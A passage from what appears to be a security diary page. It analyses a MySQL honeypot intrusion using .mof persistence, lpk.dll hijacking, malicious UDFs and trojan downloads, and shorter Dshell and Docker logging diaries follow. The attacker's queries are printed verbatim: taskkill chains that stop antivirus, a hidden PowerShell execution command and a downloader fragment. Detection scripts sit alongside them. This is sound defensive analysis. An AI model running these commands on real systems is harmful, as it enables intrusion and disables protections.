instance of __FilterToConsumerBinding as $bind
{
  Consumer = $cons;
  Filter = $Filt;
};

instance of __FilterToConsumerBinding as $bind2
{
  Consumer = $cons2;
  Filter = $Filt2;
};

instance of MyClass649 as $MyClass
{
  Name = "ClassConsumer";
};
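The hex-to-file conversion described above for ukGMx.exe and used again here for the .mof (and, further down, for the lpk.dll and UDF dumps), as an added Python example rather than the Perl this diary's author used. The statements it runs on are constructed: the PE one reuses the DOS-header prefix shown above with an assumed target path (the diary's path for ukGMx.exe is cut off), the MOF one is built from the first line of the file above, and the third is deliberately truncated to show the failure case.

```python
"""Added example (not from the diary, which used Perl): turn the hex literal from a
'SELECT 0x... into DUMPFILE' statement back into the dropped file and say what it is."""
import hashlib
import re

# The hex literal may be wrapped across lines in a log, so whitespace inside it is allowed.
DUMPFILE_RE = re.compile(
    r"SELECT\s+0x([0-9A-Fa-f\s]+?)\s*INTO\s+DUMPFILE\s+'([^']*)'", re.IGNORECASE
)


def identify(data):
    """Rough file-type call from the leading bytes."""
    if data[:2] == b"MZ":
        return "PE executable"
    if data.lstrip().startswith(b"#pragma"):
        return "MOF text"
    return "unknown"


def decode_dumpfile(statement):
    """Describe one SELECT ... INTO DUMPFILE statement, or return None if it is not one.

    INTO DUMPFILE writes the selected value to disk as raw bytes with no escaping or
    record separators, so the hex literal is the exact file image.
    """
    m = DUMPFILE_RE.search(statement)
    if not m:
        return None
    hex_text = re.sub(r"\s+", "", m.group(1))
    if len(hex_text) % 2:
        # An odd digit count means the log line was cut; refuse to guess the last nibble.
        return {"path": m.group(2), "error": "truncated hex literal"}
    data = bytes.fromhex(hex_text)
    return {
        "path": m.group(2),
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "kind": identify(data),
        "data": data,
    }


# Constructed statements in the shape seen on the honeypot. The first reuses the DOS
# header prefix shown above (target path assumed; the diary's is cut off), the second is
# built from the first line of the .mof above, the third is cut short on purpose.
MOF_HEAD = rb'#pragma namespace("\\\\.\\root\\cimv2")' + b"\n"
SAMPLE_STATEMENTS = [
    "SELECT 0x4D5A90000300000004000000FFFF0000B8000000\n"
    "00000000400000000000000000000000 into DUMPFILE 'C:/windows/system32/ukGMx.exe';",
    "SELECT 0x" + MOF_HEAD.hex().upper()
    + " into DUMPFILE 'C:/windows/system32/wbem/mof/buiXDj.mof';",
    "SELECT 0x4D5A9 into DUMPFILE 'C:/lpk.dll';",
]


if __name__ == "__main__":
    for stmt in SAMPLE_STATEMENTS:
        info = decode_dumpfile(stmt)
        print({k: v for k, v in info.items() if k != "data"})
```

Point it at a MySQL general log or honeypot transcript and every DUMPFILE statement becomes a path, a size, a hash to look up, and a first guess at what was dropped. On the defensive side, the knobs that stop this are the FILE privilege (which application accounts should not have) and secure_file_priv, which restricts INTO DUMPFILE to one directory or, when set to NULL, disables file export entirely.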

For those unfamiliar with them, “.mof” files are a very interesting attack/persistence mechanism, and, under the right circumstances, dropping a file with the extension “.mof” into the “C:\windows\system32\wbem\mof” directory can make magical things happen. “Managed Object Format” (.mof) files describe WMI classes and instances in text form; they can be used to change WMI settings or transfer WMI objects between computers.

Unfortunately for an attacker, the text form of a “.mof” file is pretty much benign. For it to actually DO anything, it needs to be compiled and loaded into the WMI repository (which is normally done using the program mofcomp.exe). The cool thing about the “C:\windows\system32\wbem\mof” directory is that, on pre-Vista versions of Windows, dropping a file into it results in the file being compiled automatically. Files that compile successfully are moved to “C:\windows\system32\wbem\mof\good” (failures go to “C:\windows\system32\wbem\mof\bad”), and a log of every action taken by the compiler is kept at “C:\windows\system32\wbem\Logs\mofcomp.log”. Whatever the file registers stays in the WMI repository and keeps firing. In this case, the “.mof” file defines a dummy class (“MyClass649”), two WQL event filters and two JScript event consumers, and binds each filter to a consumer, so that:

  1. Creating an instance of “MyClass649” (which the file itself does in its last statement, so this fires as soon as the compile finishes) triggers the filter “instfilt”; its consumer “ASEC” runs “ukGMx.exe” via Wscript.Shell and then deletes the class, the filter and itself.
  2. A running “ukGMx.exe” process exiting (the filter “qndfilt” polls for that every second, hence WITHIN 1) triggers the consumer “qndASEC”, which deletes a .mof file from the “good” directory and “ukGMx.exe” itself, then removes its own filter and consumer.

So the “.mof” file is both the launcher and the clean-up crew: the payload runs once, and the evidence is removed when it exits. (FYI: Stuxnet used a very similar attack...)

Spray N’ Pray

Now, all that is well and good if the MySQL server is running on an older version of Windows (and if MySQL is running as a privileged user…), but what happens if that isn’t the case?  Well, NoCostRemoteDBADude has a lot more bases covered:

SELECT 0x4D5A90000300000004000000FFFF0000B80000000
0000000000000000000 into DUMPFILE 'C:/Program Files/lpk.dll';

Again, we use some Perl magic to recover the binary of this file for examination:

The file lpk.dll is a 7,680 byte long 32-bit Windows DLL file that has been UPX compressed (uncompressed, it is 12,288 bytes long).

Not only does my NoCostRemoteDBADude drop lpk.dll in “C:/Program Files” but he drops the exact same file as:

  • 'C:/windows/lpk.dll'
  • 'lpk.dll'
  • 'C:/windows/system32/lpk.dll'
  • 'C:/lpk.dll'
  • 'D:/lpk.dll'
  • '%temp%/lpk.dll'
  • '%systemroot%/lpk.dll'
  • '../../bin/lpk.dll'
  • '../../lpk.dll'
  • '../lpk.dll'

NoCostRemoteDBADude’s apparent fetish for littering my hard drive with DLLs actually has a reasonable explanation: he’s attempting to exploit a DLL hijacking vulnerability.

The idea behind DLL hijacking is actually pretty simple. Windows has a search path for DLLs that works much the same way the $PATH environment variable works for finding executables. When a program asks for a DLL by bare name, the classic search order (the one used when “SafeDllSearchMode” is disabled) is:

  1. The directory from which the application is run
  2. The current directory
  3. The system directory
  4. The 16-bit system directory
  5. The Windows directory
  6. The $PATH directories

With SafeDllSearchMode enabled, which has been the default since Windows XP SP2, the current directory drops to fifth place, after the Windows directory. The application’s own directory is still searched first either way, and DLLs on the KnownDLLs list are resolved before any search at all.

Windows will look in each of those locations, in that order, until it finds the DLL it’s looking for. If, as an attacker, you can get a rogue/malicious DLL installed “in front” of the “real” DLL in that DLL search path, your DLL will be loaded instead of the real one, and run with the credentials of the application that is loading it.

By not specifying the full path to a system DLL, a program becomes vulnerable to this type of attack.  I whipped together a tiny Win32 executable that used LoadLibrary() to… well… load the library (lpk.dll). It’s a perfect example for demonstrating DLL hijacking, because I “stupidly” called LoadLibrary(“lpk.dll”) rather than specifying the full system path.  On a clean install of Windows it wouldn’t be a problem, but when I put NoCostRemoteDBADude’s version of lpk.dll in the same directory as my program, it loaded the malicious version instead.  Other programs vulnerable to “lpk.dll” hijacking? Several executables found in version 5.1 of MySQL.
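A model of that search order as an added Python example (not from this diary): it resolves LoadLibrary(“lpk.dll”) on a constructed file system under both search modes and shows that a full path skips the search entirely. The MySQL install and data directories, and the assumption that the server's current directory is its data directory, are made up for the demo; KnownDLLs are not modelled.

```python
"""Added example (not from the diary): which lpk.dll does LoadLibrary pick up?"""
from pathlib import PureWindowsPath

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"   # the 16-bit system directory
WINDIR = r"C:\Windows"

# The order listed above applies with SafeDllSearchMode off; with it on (the default
# since XP SP2) the current directory is searched after the Windows directory.
# KnownDLLs, which Windows resolves before any search, are not modelled here.
LEGACY_ORDER = ("app", "cwd", "system32", "system16", "windir", "path")
SAFE_ORDER = ("app", "system32", "system16", "windir", "cwd", "path")


def _norm(path):
    """Case-insensitive, backslash-normalised form for comparisons."""
    return str(PureWindowsPath(path)).lower()


def load_library(spec, app_dir, cwd, path_dirs, existing, safe_search=True):
    """Return the file LoadLibrary(spec) would map in, or None if nothing is found.

    A spec with a directory component is used as-is (no search at all); a bare name
    walks the search order and takes the first directory holding a file of that name.
    """
    p = PureWindowsPath(spec)
    exists = {_norm(e) for e in existing}
    if p.parent != PureWindowsPath("."):
        return str(p) if _norm(p) in exists else None
    slots = {
        "app": [app_dir], "cwd": [cwd], "system32": [SYSTEM32],
        "system16": [SYSTEM16], "windir": [WINDIR], "path": list(path_dirs),
    }
    for slot in (SAFE_ORDER if safe_search else LEGACY_ORDER):
        for directory in slots[slot]:
            candidate = PureWindowsPath(directory) / p.name
            if _norm(candidate) in exists:
                return str(candidate)
    return None


# Assumed MySQL 5.1 layout: mysqld lives in bin (the application directory) and, for
# this demo, runs with the data directory as its current directory.
APP_DIR = r"C:\Program Files\MySQL\MySQL Server 5.1\bin"
DATA_DIR = r"C:\Program Files\MySQL\MySQL Server 5.1\data"
PATH_DIRS = [SYSTEM32, WINDIR]

# Constructed file systems: only the genuine DLL; plus a copy dropped in the current
# directory; plus a copy dropped in the application directory.
CLEAN_HOST = [SYSTEM32 + r"\lpk.dll"]
CWD_DROP = CLEAN_HOST + [DATA_DIR + r"\lpk.dll"]
APP_DROP = CLEAN_HOST + [APP_DIR + r"\lpk.dll"]


if __name__ == "__main__":
    cases = (("clean", CLEAN_HOST), ("cwd drop", CWD_DROP), ("app-dir drop", APP_DROP))
    for label, fs in cases:
        for mode, safe in (("safe", True), ("legacy", False)):
            print(f'{label:13s} {mode:7s} LoadLibrary("lpk.dll") ->',
                  load_library("lpk.dll", APP_DIR, DATA_DIR, PATH_DIRS, fs, safe))
    # The hardened call: a full path means no search, and so nothing to hijack.
    print("full path ->",
          load_library(SYSTEM32 + r"\lpk.dll", APP_DIR, DATA_DIR, PATH_DIRS, APP_DROP))
```

Two things fall out of running it: a copy in the application directory wins under both search modes, which is why the attacker sprays the MySQL directories, while a copy that only lands in the current directory is picked up under the legacy order but loses to System32 under the safe one. The full-path call returns the genuine DLL in every case.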

I also used my “vulnerable” executable to investigate the behavior of the malicious DLL. When loaded, it provides all of the original functionality of the real lpk.dll with an interesting addition: it drops a 3,584 byte long 32-bit Windows PE executable as “%Temp%\hrl1.tmp” (on Windows NT/2000/XP, %Temp% defaults to C:\Documents and Settings\[UserName]\Local Settings\Temp) and launches it.

This new “gift” from NoCostRemoteDBADude is actually a UPX compressed executable that, when uncompressed, weighs in at 24,576 bytes. The executable behaves very much like our friend ukGMx.exe from earlier (complete with the goofy “self-delete” functionality) but in addition to downloading hxxp://www.game918.me:2545/host.exe to C:\Windows\scvhost.exe and running it, it also downloads hxxp://www.82022333.cn:8065/im.exe to C:\Windows\fillworm.exe - before launching both programs and self-deleting.

A “User-Defined” Attack Vector

NoCostRemoteDBADude’s next move as a DBA was firing off the following, now-familiar-looking, command:

SELECT 0x4D5A90000300000004000000FFFF0000B80000000
00000000000000000000000000000000000000000000000 into 

This results in the creation of 1QyCNY.dll, a 6,144 byte-long UPX compressed Windows DLL. Interestingly, this file isn’t seen as malicious by - essentially - any antimalware tool that doesn’t get all wigged-out because a file is UPX compressed (seriously, AegisLabs, that’s the best you’ve got? It’s UPX compressed, therefore it must be EEEEEVIL!) The reason that it isn’t seen as malicious by non-reactionary antimalware tools is because… well… it ISN’T malicious. To understand why, we need to understand a little about MySQL UDFs (or, “User Defined Functions”).

In order to provide a mechanism for “extensibility,” MySQL allows for the addition of new functionality by loading User Defined Functions in shared libraries (.so files under Linux, and .dll files in Windows). If, for example, you had a pressing need to add new functionality to your SQL-based application… say, to turn the sound volume to “11” and announce via speech synthesis, “Hey everybody! I’m lookin’ at porn...” all whilst making the server’s CD tray slide in and out - not that I’ve ever DONE anything like that, mind you... You would simply create your function, compile it into a DLL (confession.dll) as an exported function (int porn_confession( )) along with a few other, necessary support functions, and then you can add the new function to MySQL like so:

CREATE FUNCTION porn_confession RETURNS INTEGER SONAME 'confession.dll';

NoCostRemoteDBADude’s 1QyCNY.dll file isn’t seen as malicious because it is, essentially, a perfectly legitimate MySQL UDF library (or, if you’re AegisLabs, it’s an unholy, UPX-packed spawn of Satan).  It’s simply a tool - a blunt instrument - that can be used for either good -  or as we’ll soon see - for evil.

What This Hack Needs Is More PowerShell

NoCostRemoteDBADude follows this with the creation of another file:

SELECT 0x24736F757263653D22687474703A2F2F7777772E6
3742E6578652229 into DUMPFILE 'c:/windows/temp.ps1';

This file turns out to look like this:

$www=New-Object System.Net.WebClient
$www.DownloadFile($source, $destination)

Yep, it’s some PowerShell code designed to download our old pal hxxp://www.game918.me:2545/host.exe, and - this time - save it as C:\Windows\host.exe before executing it.

Hacking All the Things

But how does all of this come together? NoCostRemoteDBADude has a solution. In an effort to bring all of his work full circle, he snaps off the following commands:

select sys_eval('taskkill /f /im 360safe.exe&taskkill /f /im 360sd.exe&taskkill /f /im 360rp.exe&taskkill /f /im 360rps.exe&taskkill /f /im 360tray.exe&taskkill /f /im ZhuDongFangYu.exe&exit');
select sys_eval('taskkill /f /im SafeDogGuardCenter.exe&taskkill /f /im SafeDogSiteIIS.exe&taskkill /f /im SafeDogUpdateCenter.exe&taskkill /f /im SafeDogServerUI.exe&taskkill /f /im kxescore.exe&taskkill /f /im kxetray.exe&exit');
select sys_eval('taskkill /f /im QQPCTray.exe&taskkill /f /im QQPCRTP.exe&taskkill /f /im QQPCMgr.exe&taskkill /f /im kavsvc.exe&taskkill /f /im alg.exe&taskkill /f /im AVP.exe&exit');
select sys_eval('taskkill /f /im egui.exe&taskkill /f /im ekrn.exe&taskkill /f /im ccenter.exe&taskkill /f /im rfwsrv.exe&taskkill /f /im Ravmond.exe&taskkill /f /im rsnetsvr.exe&taskkill /f /im egui.exe&taskkill /f /im MsMpEng.exe&taskkill /f /im msseces.exe&exit');
select sys_exec('PowerShell.exe -ExecutionPolicy Unrestricted -NoProfile -windowstyle hidden -File c:\\windows\\temp.ps1');

Here we see NoCostRemoteDBADude create two new MySQL UDFs using 1QyCNY.dll: sys_exec( ) and sys_eval( ). He then uses these new functions to whack various antimalware tasks, and then launches PowerShell to run the script he just created.
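
The three steps just walked through (write a file with SELECT ... INTO DUMPFILE, register it with CREATE FUNCTION ... SONAME, then call sys_eval/sys_exec) are all visible in MySQL's general query log, which is where a defender would look for them. The following is an added example, not the diary's code: a small triage script that scans general-log lines for that pattern, decodes the hex literal of each file write to see whether it is a PE image (MZ header) or PowerShell text, and lists the UDF loads and command executions. The log lines are constructed in the shape of the general log; only the hex prefix of the MZ header and the attacker's queries are taken from the diary.

```python
"""Added example (not from the diary): triage a MySQL general query log for the
DUMPFILE -> CREATE FUNCTION ... SONAME -> sys_eval/sys_exec pattern."""
import re

# General-log line shape: "<date time>\t<conn id> <command>\t<argument>"
LOG_LINE = re.compile(r"^(?:\d{6} \d\d:\d\d:\d\d)?\s*(?P<conn>\d+)\s+(?P<cmd>\w+)\t(?P<arg>.*)$")
HEX_LITERAL = re.compile(r"\b0x([0-9A-Fa-f]+)")
FILE_WRITE = re.compile(r"\binto\s+(dumpfile|outfile)\s+'([^']+)'", re.I)
UDF_LOAD = re.compile(r"\bcreate\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)
UDF_CALL = re.compile(r"\b(sys_eval|sys_exec)\s*\(\s*'((?:[^'\\]|\\.)*)'", re.I)
POWERSHELL_MARKERS = (b"new-object", b"downloadfile", b"system.net.webclient", b"invoke-expression")


def decode_hex_literal(digits):
    """MySQL 0x... literal to bytes (an odd digit count gets a leading zero)."""
    return bytes.fromhex(digits if len(digits) % 2 == 0 else "0" + digits)


def classify_payload(blob):
    """Rough content type of what a DUMPFILE write would put on disk."""
    if blob.startswith(b"MZ"):
        return "pe_executable"
    low = blob.lower()
    if any(marker in low for marker in POWERSHELL_MARKERS):
        return "powershell"
    return "unknown"


def scan_general_log(text):
    """Return one finding per suspicious Query line, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd").lower() != "query":
            continue
        conn, query = m.group("conn"), m.group("arg")
        fw = FILE_WRITE.search(query)
        if fw:
            hx = HEX_LITERAL.search(query)
            path = fw.group(2)
            findings.append({
                "conn": conn, "rule": "file_write", "path": path,
                "system_path": path.lower().replace("\\", "/").startswith("c:/windows"),
                "payload": classify_payload(decode_hex_literal(hx.group(1))) if hx else "none",
            })
        ul = UDF_LOAD.search(query)
        if ul:
            findings.append({"conn": conn, "rule": "udf_load",
                             "function": ul.group(1), "library": ul.group(2)})
        for uc in UDF_CALL.finditer(query):
            findings.append({"conn": conn, "rule": "udf_exec",
                             "function": uc.group(1).lower(), "command": uc.group(2)})
    return findings


def _entry(conn, cmd, arg):
    # Constructed general-log line; the timestamp is fixed because only the argument matters here.
    return f"160601 20:10:05\t{conn:>5} {cmd}\t{arg}"


# The MZ prefix matches the diary's hex; the rest of both payloads is constructed.
MZ_HEX = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00".hex().upper()
PS1_HEX = b"$www=New-Object System.Net.WebClient\r\n$www.DownloadFile($source, $destination)".hex().upper()

SAMPLE_LOG = "\n".join([
    _entry(12, "Connect", "root@203.0.113.9 on"),
    _entry(12, "Query", "select version()"),
    _entry(12, "Query", f"SELECT 0x{MZ_HEX} into DUMPFILE 'c:/windows/lpk.dll'"),
    _entry(12, "Query", f"SELECT 0x{MZ_HEX} into DUMPFILE 'c:/windows/1QyCNY.dll'"),
    _entry(12, "Query", "CREATE FUNCTION sys_eval RETURNS STRING SONAME '1QyCNY.dll'"),
    _entry(12, "Query", f"SELECT 0x{PS1_HEX} into DUMPFILE 'c:/windows/temp.ps1'"),
    _entry(12, "Query", "select sys_eval('taskkill /f /im MsMpEng.exe&taskkill /f /im msseces.exe&exit')"),
    _entry(12, "Query", r"select sys_exec('PowerShell.exe -ExecutionPolicy Unrestricted -NoProfile -windowstyle hidden -File c:\\windows\\temp.ps1')"),
    _entry(13, "Query", "SELECT name FROM customers WHERE id = 42"),
])

if __name__ == "__main__":
    for finding in scan_general_log(SAMPLE_LOG):
        print(finding)
```

Every finding carries the connection id, so the six hits from connection 12 chain into one story while the ordinary SELECT on connection 13 produces nothing. A DUMPFILE write whose decoded literal starts with MZ, followed by a SONAME load of the same library name, is the combination worth alerting on; a legitimate INTO OUTFILE export decodes to neither a PE image nor PowerShell.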

“...And Then Everyone In The Universe Died.” - Game Of Thrones, Book XXI

So, the end-game for NoCostRemoteDBADude is to get host.exe downloaded from www.game918.me and running on our system (he also wanted to download something from www.82022333.cn, but that site is currently kaput...).  Let’s take a look at that file, shall we?

The file “host.exe” is, essentially, a 102,400 byte-long 32-bit Windows PE remote control trojan with the capability to both download and install or run pretty much anything that NoCostRemoteDBADude wants put on the box.  Obviously, this is how he intends to do his DBA work.

In addition to its run-of-the-mill “remote administration” capabilities, host.exe also has another nifty capability. Buried deep in the bowels of the program’s data is an interesting list of 180 IP addresses.  I cut the list out of the file and did a little “reconnaissance.” What I found was very interesting: Every one of the IPs is a DNS server - moreover, every one acts as a recursive resolver.  I can think of only one reason that NoCostRemoteDBADude would have uploaded an executable primed with an expansive list of recursive resolvers: DNS Amplification DDoS.

The classic example of an “amplification” attack harkens back to the ‘90s when you used to be able to send an ICMP echo request from a spoofed IP to the broadcast address of a netblock. Back in that more-naïve time, the router would see an inbound packet destined for the broadcast address and dutifully forward it to every IP address in the block, resulting in a wave of ICMP echo responses being sent back to the spoofed IP address. For reasons I’ve been unable to figure out, this was known as a SMURF attack, and demonstrates the two requirements of a good amplification attack:

  1. The traffic that initiates the response is sent over a connection-less protocol (in this case, ICMP) and is, therefore, easily spoofed.
  2. The response elicited is significantly larger than the traffic that initiates it.

SMURF attacks have - happily - been relegated to the same dustbin o’ history as other ‘90s “stuff” we’d like to forget (Vanilla Ice, slap bracelets, and - oh, dear Lord - parachute pants) but that doesn’t mean amplification attacks are gone.

DNS fits both of our amplification criteria very well: requests are sent over a connection-less protocol (UDP) and you can get a pretty good amplification if you make the right request.  All you need is a bunch of friendly DNS servers that will allow anyone and everyone to make requests...

Alrighty Then...

NoCostRemoteDBADude had a few more tricks up his sleeve.  He tried several different types and versions of UDFs, and attempted to create new MySQL accounts, but this overview covers his most interesting techniques. I found this to be a fascinating attack simply because of the broad range of “tricks of the trade” in use: DLL hijacking, .mof files, MySQL UDFs, PowerShell, AV disabling, and DNS amplification… it’s a pretty broad swath of attacker techniques. 

Also, this is a perfect example of why AV vendors and others who tout “malware removal” methods are not doing anyone a favor. Once any of these executables are running on my server, the whole concept of “cleanup” becomes untenable because I can’t have any idea about what other “toyz” ol’ NoCost may have installed.

Well, at least until my server starts yelling “Hey everybody, I’m watchin’ porn!”...

Tom Liston
Consultant - Cyber Network Defense
DarkMatter, LLC
Follow Me On Twitter: @tliston
If you enjoyed this post, you can see more like it on my personal blog: http://yourflyisopen.com


Published: 2016-06-01

Performing network forensics with Dshell. Part 2: Decoder development process

We saw in part 1 how useful dshell can be. Let's talk about the decoder development process. You can develop the following decoder types:

  • PacketDecoder: This type of decoder is able to look for specific packet information in a live capture or PCAP file and then show it to the user in a customized way. 
  • SessionDecoder: This type of decoder is able to get information from a complete protocol session, from the initial connection to the end of the session.

Dshell has the following classes that can be used to develop the decoders:

  • dfile: Dshell class to handle file functions, whether files are in memory or on disk.
  • dnsdecoder: Dshell intermediate class used to support DNS-based decoders
  • dshell: Base class used to initialize the decoder to work in the framework. You can choose to use IPDecoder, IP6Decoder, UDPDecoder, UDP6Decoder, TCPDecoder, TCP6Decoder, Data, Packet, Connection or Blob
  • httpdecoder: Dshell intermediate class used to support HTTP-based decoders
  • util: Dshell class providing useful functions such as decode_base64 to decode base64 strings, printableText to print only ASCII-printable characters to the screen, printableUnicode to print Unicode text without the control characters, hexPlusAscii to return a two-column hex dump of binary input, URLDataToParameterDict to parse a URL-format string into parameters, strtok to tokenize a string as in C, and xorStringDecode to decode an XOR-encoded string.
  • smbdecoder: This decoder extends dshell.TCPDecoder to handle SMB message requests/responses.

Let's see an example of a simple decoder, which uses the dpkt library as well:

This looks like a packet decoder, using the base definition of IPDecoder contained in the Dshell class. 

This function is part of all packet decoders. In this case, the dpkt library is used to dissect the IP packet and get just the TCP header into the tcp variable. After that:

  • If the SYN flag is set, the source port, destination port, source IP, destination IP and sequence number are printed
  • Otherwise, if the RST/ACK flags are set, the source port, destination port, source IP, destination IP and sequence number are printed

Finally, the decoder object is instantiated. The whole code looks like this:

You can find this and other examples inside the decoders directory of Dshell.
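
The decoder logic described above, as an added example that is neither the diary's code nor Dshell's own: it reimplements the packetHandler() method that Dshell packet decoders provide in plain Python, parsing the IPv4 and TCP headers with the standard-library struct and socket modules instead of the dshell.IPDecoder base class and dpkt, so it runs without Dshell installed. The SynRstDecoder class name, the build_ipv4_tcp() helper and the packet addresses and ports are constructed for the example.

```python
"""Added example (not from the diary or Dshell): the SYN / RST-ACK packet decoder
logic described above, rewritten on the standard library so it runs stand-alone."""
import socket
import struct

TCP_SYN = 0x02
TCP_RST = 0x04
TCP_ACK = 0x10


class SynRstDecoder:
    """Stand-in for a Dshell packet decoder.  Dshell would hand packetHandler() an
    ip object built by dpkt; here it receives the raw IPv4 packet bytes instead."""

    def __init__(self):
        self.results = []  # (kind, src, sport, dst, dport, seq) tuples

    def packetHandler(self, pkt):
        if len(pkt) < 20 or pkt[0] >> 4 != 4:
            return None                        # not an IPv4 packet
        ihl = (pkt[0] & 0x0F) * 4              # IPv4 header length in bytes
        if pkt[9] != 6 or len(pkt) < ihl + 20:
            return None                        # not TCP, or TCP header truncated
        src = socket.inet_ntoa(pkt[12:16])
        dst = socket.inet_ntoa(pkt[16:20])
        sport, dport, seq = struct.unpack("!HHI", pkt[ihl:ihl + 8])
        flags = pkt[ihl + 13]                  # TCP flags byte follows the data offset byte
        if flags & TCP_SYN:
            kind = "SYN"
        elif flags & TCP_RST and flags & TCP_ACK:
            kind = "RST/ACK"
        else:
            return None                        # anything else is ignored, as in the diary
        record = (kind, src, sport, dst, dport, seq)
        self.results.append(record)
        print("%s %s:%d -> %s:%d seq=%d" % record)
        return record


def build_ipv4_tcp(src, sport, dst, dport, seq, flags):
    """Constructed test packet: minimal IPv4 + TCP headers, no payload, checksums zeroed."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


# Constructed traffic: a SYN to port 25, the RST/ACK answering it, and a plain ACK to ignore.
SAMPLE_PACKETS = [
    build_ipv4_tcp("192.0.2.10", 41017, "198.51.100.5", 25, 1000, TCP_SYN),
    build_ipv4_tcp("198.51.100.5", 25, "192.0.2.10", 41017, 0, TCP_RST | TCP_ACK),
    build_ipv4_tcp("192.0.2.10", 41018, "198.51.100.5", 80, 2000, TCP_ACK),
]


def run(packets=SAMPLE_PACKETS):
    """Dshell decoder modules end by instantiating the decoder object; same here."""
    dObj = SynRstDecoder()
    for pkt in packets:
        dObj.packetHandler(pkt)
    return dObj.results


if __name__ == "__main__":
    run()
```

A SYN immediately answered by a RST/ACK is the signature of a connection attempt to a closed port, which is why this pair of checks is a useful first decoder: feed it a PCAP of a noisy host and the printed lines are the failed connection attempts.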

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
e-mail: msantand at isc dot sans dot org


Published: 2016-06-01

Docker Containers Logging

In a previous diary, Jim talked about forensic operations against Docker containers. To be able to perform investigations after an incident, we must have some “fresh meat” to search for artefacts. As Jim explained, memory is always a nice place to search (Volatility is your best friend) but memory is... volatile! Docker is also very volatile by design. You don't know exactly where the containers are deployed, and system access to collect a memory image is not always easy. To increase our chances of finding artefacts, it’s always better to collect data before the incident occurs, and there is no magic: logs remain the best way to collect data.
Docker comes with multiple ways to log containers’ events. More and more focus has been put on logging and today many logging drivers are available:
  • json-file (JSON messages written to a flat file)
  • syslog
  • journald
  • gelf (Graylog Extended Log Format, used with Logstash)
  • fluentd
  • awslogs (Amazon Web Services)
  • splunk
  • etwlogs (on Windows)
  • gcplogs (Google Cloud Logging)

The default driver is ‘json-file’. Files are written on the Docker host (where the daemon is running) and are located in the following directory:
To review the logs, the command “docker logs ” can be used:
# docker logs dshield
Validating provided credentials...
API key verification succeeded!
Starting cowrie...
Removing stale pidfile /srv/cowrie/cowrie.pid 
Easy, but not very convenient, and the data remains stored on the box. By design, some containers may have a very limited lifetime and once deleted, their logs are gone too. It’s easy to replace the default driver with your preferred one. At daemon level, specify the driver to use and its options:
# docker daemon --log-driver= --log-opt 
Each driver comes with its own set of options that can be fine-tuned with '--log-opt ='. For example, with the syslog driver we can configure the remote syslog server and facility. More information about the different ways to configure logging is available on the Docker website. On Ubuntu, the best way to change the default configuration is to change the 'DOCKER_OPTS' environment variable in /etc/default/docker/. Here is mine:
DOCKER_OPTS='--log-driver=splunk \
--log-opt splunk-token=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx \
--log-opt splunk-url=https://splunk.fqdn.tld:8088 \
--log-opt splunk-insecureskipverify=true \
--log-opt tag="{{.ImageName}}/{{.Name}}/{{.ID}}" \
--log-opt labels=type,location'
Personally, I like the Splunk HTTP Event Collector. It is HTTP-based and easy to deploy. Once you have configured your Splunk instance to receive events from Docker, you have full visibility. Note that you can use a different driver for a specific container (e.g. if you run a container for a customer or partner who wants to use a syslog destination).
Here is an example of a simple bash output in a Ubuntu container:
We find a lot of interesting information:
(1) the user on the container ID
(2) the working directory
(3) the typed command in bash
(4) the image, container name and ID
Two important notes about container logging. The first one is about timestamps: by default, a container is started with its clock set to UTC. Keep this in mind while performing investigations. To set the correct time zone, add the following lines to your Dockerfile:
# Set the timezone
RUN echo "Europe/Brussels" > /etc/timezone
RUN dpkg-reconfigure -f noninteractive tzdata
The second point is about logging network traffic. When the Docker daemon is started, a network dedicated to containers is deployed: an extra interface 'docker0' is created and a subnet is dedicated to containers. An IP address is dynamically assigned to each container when it is launched. From a forensic perspective, it is very interesting to log the egress traffic. For better visibility of the traffic to and from containers, enable extra logging with the following command (insert a LOG rule at the top of the FORWARD chain):
# iptables -I FORWARD 1 -j LOG

This will generate extra Syslog events (can be a huge amount!). The first one is an outgoing connection from a container, the second is an incoming connection:

Jun  1 20:15:36 inception kernel: [8415191.429757] IN=docker0 OUT=eth0 PHYSIN=veth2ad35f6 \
MAC=02:42:c6:a7:b3:f2:02:42:ac:11:00:04:08:00 SRC= DST= LEN=52 TOS=0x00 \
PREC=0x00 TTL=63 ID=15759 DF PROTO=TCP SPT=41017 DPT=25 WINDOW=229 RES=0x00 ACK URGP=0 

Jun  1 20:59:10 inception kernel: [8417805.742798] IN=eth0 OUT=docker0 \
MAC=c2:41:32:db:26:fc:00:00:24:d0:69:51:08:00 SRC= DST= LEN=140 TOS=0x18 \
PREC=0x20 TTL=117 ID=7085 DF PROTO=TCP SPT=50424 DPT=2222 WINDOW=512 RES=0x00 ACK PSH URGP=0
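
To show what those kernel LOG lines give an investigator once they are in syslog, here is an added parser (not part of the diary) that turns them into records, derives the direction from whether docker0 is the IN or the OUT interface, and tallies the destination ports of container egress. The sample lines are constructed in the shape of the two above; their addresses are made up (RFC 5737 ranges and Docker's default 172.17.0.0/16 bridge subnet) because the diary's lines have the addresses removed.

```python
"""Added example (not from the diary): parse netfilter LOG lines for Docker's
bridge and summarise container egress by destination port."""
import re
from collections import Counter

KV = re.compile(r"\b([A-Z]+)=(\S*)")
BARE_FLAGS = {"SYN", "ACK", "PSH", "FIN", "RST", "URG", "DF"}  # tokens logged without a value
INT_FIELDS = ("SPT", "DPT", "TTL", "ID")

# Constructed sample: two TCP lines like the diary's, one UDP DNS line, and one
# unrelated syslog line that the parser must skip.
SAMPLE_SYSLOG = """\
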